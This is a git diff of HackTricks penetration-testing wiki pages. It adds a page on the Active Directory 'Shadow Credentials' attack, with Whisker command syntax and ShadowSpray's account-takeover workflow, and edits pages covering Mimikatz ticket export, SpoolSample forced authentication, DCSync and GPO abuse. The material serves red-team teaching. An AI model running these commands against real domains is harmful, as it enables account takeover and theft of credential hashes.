* [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2)
|
* [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2)
|
||||||
* [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
* [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
|
@ -0,0 +1,111 @@
|
||||||
|
# Shadow Credentials
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Intro <a href="#3f17" id="3f17"></a>
|
||||||
|
|
||||||
|
Check the original post for [**all the information about this technique**](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab).
|
||||||
|
|
||||||
|
As **summary**: if you can write to the **msDS-KeyCredentialLink** property of a user/computer, you can retrieve the **NT hash of that object**.
|
||||||
|
|
||||||
|
This is because you will be able to set **public-private key authentication credentials** for the object and use them to obtain a **special Service Ticket that contains its NTLM hash** inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM\_SUPPLEMENTAL\_CREDENTIAL entity that you can decrypt.
|
||||||
|
|
||||||
|
### Requirements <a href="#2de4" id="2de4"></a>
|
||||||
|
|
||||||
|
This technique requires the following:
|
||||||
|
|
||||||
|
* At least one Windows Server 2016 Domain Controller.
|
||||||
|
* A digital certificate for Server Authentication installed on the Domain Controller.
|
||||||
|
* Windows Server 2016 Functional Level in Active Directory.
|
||||||
|
* Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.
|
||||||
|
|
||||||
|
## Abuse
|
||||||
|
|
||||||
|
Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options:
|
||||||
|
|
||||||
|
1. Forge an **RC4 silver ticket** to impersonate privileged users to the corresponding host.
|
||||||
|
2. Use the TGT to call **S4U2Self** to impersonate **privileged users** to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name.
|
||||||
|
|
||||||
|
Key Trust abuse has the added benefit that it doesn’t delegate access to another account which could get compromised — it is **restricted to the private key generated by the attacker**. In addition, it doesn’t require creating a computer account that may be hard to clean up until privilege escalation is achieved.
|
||||||
|
|
||||||
|
Whisker
|
||||||
|
|
||||||
|
Alongside this post I am releasing a tool called “ [Whisker](https://github.com/eladshamir/Whisker) “. Based on code from Michael’s DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol.
|
||||||
|
|
||||||
|
[Whisker](https://github.com/eladshamir/Whisker) has four functions:
|
||||||
|
|
||||||
|
* Add — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
|
||||||
|
* List — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
|
||||||
|
* Remove — This function removes a key credential from the target object specified by a DeviceID GUID.
|
||||||
|
* Clear — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.
|
||||||
|
|
||||||
|
## [Whisker](https://github.com/eladshamir/Whisker) <a href="#7e2e" id="7e2e"></a>
|
||||||
|
|
||||||
|
Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their `msDS-KeyCredentialLink` attribute, effectively adding "Shadow Credentials" to the target account.
|
||||||
|
|
||||||
|
[**Whisker**](https://github.com/eladshamir/Whisker) has four functions:
|
||||||
|
|
||||||
|
* **Add** — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
|
||||||
|
* **List** — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
|
||||||
|
* **Remove** — This function removes a key credential from the target object specified by a DeviceID GUID.
|
||||||
|
* **Clear** — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.
|
||||||
|
|
||||||
|
### Add
|
||||||
|
|
||||||
|
Add a new value to the **`msDS-KeyCredentialLink`** attribute of a target object:
|
||||||
|
|
||||||
|
* `/target:<samAccountName>`: Required. Set the target name. Computer objects should end with a '$' sign.
|
||||||
|
* `/domain:<FQDN>`: Optional. Set the target Fully Qualified Domain Name (FQDN). If not provided, will try to resolve the FQDN of the current user.
|
||||||
|
* `/dc:<IP/HOSTNAME>`: Optional. Set the target Domain Controller (DC). If not provided, will try to target the Primary Domain Controller (PDC).
|
||||||
|
* `/path:<PATH>`: Optional. Set the path to store the generated self-signed certificate for authentication. If not provided, the certificate will be printed as a Base64 blob.
|
||||||
|
* `/password:<PASWORD>`: Optional. Set the password for the stored self-signed certificate. If not provided, a random password will be generated.
|
||||||
|
|
||||||
|
Example: **`Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1`**
|
||||||
|
|
||||||
|
{% hint style="info" %}
|
||||||
|
More options on the [**Readme**](https://github.com/eladshamir/Whisker).
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
## [ShadowSpray](https://github.com/Dec0ne/ShadowSpray/)
|
||||||
|
|
||||||
|
In several cases, the group "Everyone" / "Authenticated Users" / "Domain Users" or some other **wide group** contains almost all the users in the domain has some `GenericWrite`/`GenericAll` DACLs **over other objects** in the domain. [**ShadowSpray**](https://github.com/Dec0ne/ShadowSpray/) tries to **abuse** therefore **ShadowCredentials** over all of them
|
||||||
|
|
||||||
|
It goes something like this:
|
||||||
|
|
||||||
|
1. **Login** to the domain with the supplied credentials (Or use the current session).
|
||||||
|
2. Check that the **domain functional level is 2016** (Otherwise stop since the Shadow Credentials attack won't work)
|
||||||
|
3. Gather a **list of all the objects** in the domain (users and computers) from LDAP.
|
||||||
|
4. **For every object** in the list do the following:
|
||||||
|
1. Try to **add KeyCredential** to the object's `msDS-KeyCredentialLink` attribute.
|
||||||
|
2. If the above is **successful**, use **PKINIT** to request a **TGT** using the added KeyCredential.
|
||||||
|
3. If the above is **successful**, perform an **UnPACTheHash** attack to reveal the user/computer **NT hash**.
|
||||||
|
4. If **`--RestoreShadowCred`** was specified: Remove the added KeyCredential (clean up after yourself...)
|
||||||
|
5. If **`--Recursive`** was specified: Do the **same process** using each of the user/computer **accounts we successfully owned**.
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
|
||||||
|
* [https://github.com/eladshamir/Whisker](https://github.com/eladshamir/Whisker)
|
||||||
|
* [https://github.com/Dec0ne/ShadowSpray/](https://github.com/Dec0ne/ShadowSpray/)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
|
</details>
|
|
@ -4,15 +4,11 @@
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
@ -29,7 +25,6 @@ You can **find Computer objects with this attribute** checking if the [userAccou
|
||||||
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
|
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
|
||||||
<strong>## ADSearch
|
<strong>## ADSearch
|
||||||
</strong>ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
|
</strong>ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
|
||||||
|
|
||||||
<strong># Export tickets with Mimikatz
|
<strong># Export tickets with Mimikatz
|
||||||
</strong>privilege::debug
|
</strong>privilege::debug
|
||||||
sekurlsa::tickets /export #Recommended way
|
sekurlsa::tickets /export #Recommended way
|
||||||
|
@ -53,7 +48,7 @@ To make a print server login against any machine you can use [**SpoolSample**](h
|
||||||
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
|
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
|
||||||
```
|
```
|
||||||
|
|
||||||
If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\
|
If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse/#dcsync) and obtain all the hashes from the DC.\
|
||||||
[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
|
[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
|
||||||
|
|
||||||
**Here are other ways to try to force an authentication:**
|
**Here are other ways to try to force an authentication:**
|
||||||
|
@ -71,14 +66,10 @@ If the TGT if from a domain controller, you could perform a[ **DCSync attack**](
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -155,7 +155,7 @@ Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (n
|
||||||
### Group Policy Object - GPOs
|
### Group Policy Object - GPOs
|
||||||
|
|
||||||
If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
|
If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
|
||||||
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation).
|
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
#GPO
|
#GPO
|
||||||
|
@ -193,8 +193,8 @@ Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectNam
|
||||||
|
|
||||||
Learn how to **exploit permissions over GPOs and ACLs** in:
|
Learn how to **exploit permissions over GPOs and ACLs** in:
|
||||||
|
|
||||||
{% content-ref url="../active-directory-methodology/acl-persistence-abuse.md" %}
|
{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %}
|
||||||
[acl-persistence-abuse.md](../active-directory-methodology/acl-persistence-abuse.md)
|
[acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### ACL
|
### ACL
|
||||||
|
|
Loading…
Reference in a new issue